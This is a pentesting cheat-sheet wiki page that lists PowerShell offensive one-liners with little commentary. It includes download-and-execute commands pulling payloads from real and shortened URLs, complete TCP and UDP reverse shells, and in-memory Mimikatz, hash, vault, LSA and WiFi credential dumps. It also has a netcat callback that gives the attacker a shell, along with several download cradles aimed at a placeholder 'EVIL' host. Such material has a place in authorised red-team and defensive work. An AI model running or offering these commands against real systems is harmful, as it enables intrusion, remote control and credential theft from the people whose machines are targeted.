From BHaFSec Pentesting Notes Wiki
Jump to: navigation, search

WebDL and execute

powershell -ExecutionPolicy Bypass -noLogo -Command Import-Module BitsTransfer;Start-BitsTransfer http://www.illmob.org/test.exe test.exe;./test.exe;


powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('http://illmob.org/test.exe','test.exe');./test.exe;


powershell -ExecutionPolicy Bypass -noLogo -Command Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t')

Reverse TCP Shell

$client = New-Object System.Net.Sockets.TCPClient("",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Reverse UDP Shell

$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse(""),53);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive([ref]$endpoint);$returndata = ([text.encoding]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = ([text.encoding]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close()

WebDL and execute mimikatz totally in memory

Uses Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory to dump credentials without ever writing the mimikatz binary to disk. Dump all domain creds with mimikatz

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

This Invoke-Mimikatz.cs.ps1 Invokes x86 or x64 Mimiktaz Inside of PowerShell Process

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/BD2toB'); Invoke-Mimikatz -DumpCreds"

WebDL and execute hashdump totally in memory

Hashes are dumped using a modified version of powerdump script from MSF written by David Kennedy. Administrator privileges are required for this script

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/MHa1Bj'); Get-PassHashes"

WebDL and execute Get-VaultCredential totally in memory

Get-VaultCredential enumerates and displays all credentials stored in the Windows vault. Web credentials, specifically are displayed in cleartext.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/57uScy'); Get-VaultCredential"

WebDL and execute LSA Secrets totally in memory

Extracts LSA secrets from HKLM:\\SECURITY\Policy\Secrets\ on a local computer. The payload must be run with elevated permissions, in 32-bit mode and requires permissions to the security key in HKLM. The permission could be obtained by using Enable-DuplicateToken payload.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/qhgsX1');"

Dump stored Autologon password

Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' | select defaultusername,defaultpassword

Dump WIFI Passwords

$wlans = netsh wlan show profiles | Select-String -Pattern "All User Profile" | Foreach-Object {$_.ToString()}
$exportdata = $wlans | Foreach-Object {$_.Replace("    All User Profile     : ",$null)}
$exportdata | ForEach-Object {netsh wlan show profiles name="$_" key=clear}


(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize


(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} |%{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize


foreach($profil in (netsh wlan show profiles | Select-String ':')){foreach($line in (netsh wlan show profiles name=($profil.toString().split(':')[1].trim()) key=clear)){$line+';'}};


((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate([System.Security.Principal.NTAccount])).value

USERS2SID & Last Logon

gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto

Query Domain Admins

Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"

Query Process/Service

gps | ?{$_.name -match "<process/service name>"} | ?{$_.id -match "<process/service id>"} | select *

Query Drives


WEbInject callback | powershell.exe (new-object System.Net.WebClient).Downloadfile('', 'nc.exe')

Then, once the command completed, I set up a netcat listener on my attacker machine and issued a second command to the web application to push a shell back to my attacker machine via netcat: | nc.exe -e cmd.exe 21

Port Scan

PS C:\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("",$_)) "Port $_ is open!"} 2>$null 

Ping Sweep

PS C:\> 1..255 | % {echo "10.10.10.$_"; ping -n 1 -w 100 10.10.10.$_ | SelectString  ttl} 

Find Files

PS C:\> Get-ChildItem "C:\Users\" - recurse -include *passwords*.txt 

Text 2 Speech

powershell (New-Object -ComObject Sapi.SpVoice).Speak(('All Your Base R Belong To Us.'))

Other Resources: Nishang Github

Download Cradles

from https://gist.github.com/HarmJ0y/bb48307ffa663256e239

  1. normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
  1. PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
  1. hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
  1. Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
  1. WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
  1. using bitstransfer- touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r
  1. DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)
  2. code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
  1. from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d
<?xml version="1.0"?>
$a = New-Object System.Xml.XmlDocument
$a.command.a.execute | iex